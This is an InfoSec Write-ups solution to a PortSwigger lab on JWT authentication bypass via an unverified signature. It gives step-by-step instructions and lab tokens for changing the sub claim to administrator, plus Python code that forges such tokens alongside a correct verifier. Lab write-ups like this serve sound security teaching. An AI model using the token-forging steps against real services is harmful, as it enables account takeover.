JWT authentication bypass via unverified signature — Portswigger Simple Solution Writeup | 2023

Portswigger Lab Solution — JWT Authentication Bypass by Karthikeyan Nagaraj

InfoSec Write-ups

Lab Link:

Lab Description:

This lab uses a JWT-based mechanism for handling sessions. Due to implementation flaws, the server doesn’t verify the signature of any JWTs that it receives.

To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

What is JWT?

JWT stands for JSON Web Token.

A JSON Web Token is a proposed Internet standard for creating data with an optional signature and/or optional encryption, whose payload holds JSON that asserts some number of claims.

The tokens are signed using either a shared secret or a public/private key pair.

Analysis:

1. Log in with wiener:peter

2. Now look at the cookie using Cookie Editor or by intercepting the traffic

eyJraWQiOiJlMWYyMzczMC00NDUxLTRjMTMtYWViZi04M2Y2MmMxYmYzOGEiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY3MzgwMTUxNH0.NpgK9DOlKKauq0iI255qe5HbYVyEv8Ze9ODe6VfKdh6VkJ9fOMOL5o_rpwvtxxHsakeZPXN8ktG1SL5y9I-D2zfHhLMI3hWGXXdXVXyw0GGbOkfCmJJWyDDljPrQYvcqJbB2uPvsDs7IkVhyklK89-Q2woAGQU4KVAiXBa7tM-pWIgsqn8w9Dl1jNc1cfMJ0yVjfmo5qEOIaFMlIkNvzfYuihsdjTZDOA00ZgDj9K3eryQn1zPJh7hMp6on1mwK1ieQ_aO-dIWZ_x3bXYootpX08ijfdmL12VKr9_RKv9ppQiDbqXvYsTC36482Wlc5LRfCOx_XE_VaQu62a0Q10hA

It looks like they have used a JWT for authentication.

3. Let's decode the token using jwt.io

From this, we can see that the sub claim identifies the user who is logged in.

Because the server does not verify the signature, changing the sub value to another user's name lets us access that account with that user's privileges, for example the administrator.

4. Change the value wiener to administrator

As soon as you change the value, the encoded token changes as well.

eyJraWQiOiJlMWYyMzczMC00NDUxLTRjMTMtYWViZi04M2Y2MmMxYmYzOGEiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NzM4MDE1MTR9.PEWC1x0JyP2oADxuxvfj_rNI-wZqxjvkyPsFvDK5_jVCXg9kb-00OHg9b7GRcugRVLokInxsb0IpDunxIgvD362TbQBI4ONACpou0nmBH11a9nkCrQ7qxkFMYgb6cKM7JQjX2gn5IvArWmUPOvSQUZv9hKBautpLijRAn8xn6z4-Y6UOYtfdqUnQrj0S-4oetIMPP29soB9x6yQ80YPk81dHi7OanX5TR1izRmCIXn_7RA2WiTHSnNsB2ARDuzXsVzel97g4-pFUdInybgGizMIRp5942G3JU352hzjIw3XXw_3x1InT0DJPdFR7iaF4q3KY0O_WkJirodni-uf2eA

The above token's sub value is set to administrator.

5. Copy the token and paste it into the session cookie using the Cookie Editor

6. Then try to access the /admin page

7. Now you have access to delete users; delete carlos to solve the lab
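As an added illustration (not part of the original writeup), the following Python decodes the session token shown above and contrasts the vulnerable behaviour, trusting the claims without ever checking the signature, with a verifying check. HS256 with a constructed key is assumed for the offline demo; the lab itself uses RS256, where the same verification step uses the RSA public key instead.

```python
import base64, hashlib, hmac, json
from typing import Optional

# Session token copied from the writeup above (RS256, sub=wiener). It is only decoded here,
# never verified: the lab's RSA public key is not on the page.
LAB_TOKEN = "eyJraWQiOiJlMWYyMzczMC00NDUxLTRjMTMtYWViZi04M2Y2MmMxYmYzOGEiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY3MzgwMTUxNH0.NpgK9DOlKKauq0iI255qe5HbYVyEv8Ze9ODe6VfKdh6VkJ9fOMOL5o_rpwvtxxHsakeZPXN8ktG1SL5y9I-D2zfHhLMI3hWGXXdXVXyw0GGbOkfCmJJWyDDljPrQYvcqJbB2uPvsDs7IkVhyklK89-Q2woAGQU4KVAiXBa7tM-pWIgsqn8w9Dl1jNc1cfMJ0yVjfmo5qEOIaFMlIkNvzfYuihsdjTZDOA00ZgDj9K3eryQn1zPJh7hMp6on1mwK1ieQ_aO-dIWZ_x3bXYootpX08ijfdmL12VKr9_RKv9ppQiDbqXvYsTC36482Wlc5LRfCOx_XE_VaQu62a0Q10hA"

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def decode_unverified(token: str) -> dict:
    """What the vulnerable server effectively does: read the claims and trust them,
    never looking at the third (signature) segment."""
    header, payload, _signature = token.split(".")
    return {"header": json.loads(b64url_decode(header)),
            "payload": json.loads(b64url_decode(payload))}

def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a token over a shared secret (HS256 is an assumption for this offline demo)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    mac = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(mac)}"

def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """The fix: pin the algorithm, recompute the MAC over header.payload and compare it
    in constant time. Any mismatch means the claims are not trusted at all."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header, body, signature = parts
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        return None  # the token must not choose the algorithm ("none", RS256/HS256 confusion)
    expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature)):
        return None
    return json.loads(b64url_decode(body))

def change_sub(token: str, new_sub: str) -> str:
    """Step 4 of the writeup reproduced offline: re-encode the payload with a new sub while
    keeping the original, now stale, signature. Used here to test the verifier."""
    header, body, signature = token.split(".")
    claims = json.loads(b64url_decode(body))
    claims["sub"] = new_sub
    return f"{header}.{b64url_encode(json.dumps(claims, separators=(',', ':')).encode())}.{signature}"
```

With a verifying check, the re-encoded token is rejected outright; with the vulnerable decode it is accepted as administrator, which is exactly what the lab demonstrates.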

Watch the below gif!!

Feel free to ask queries via LinkedIn and to buy me a coffee : )

Thank you for Reading!!

Happy Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng
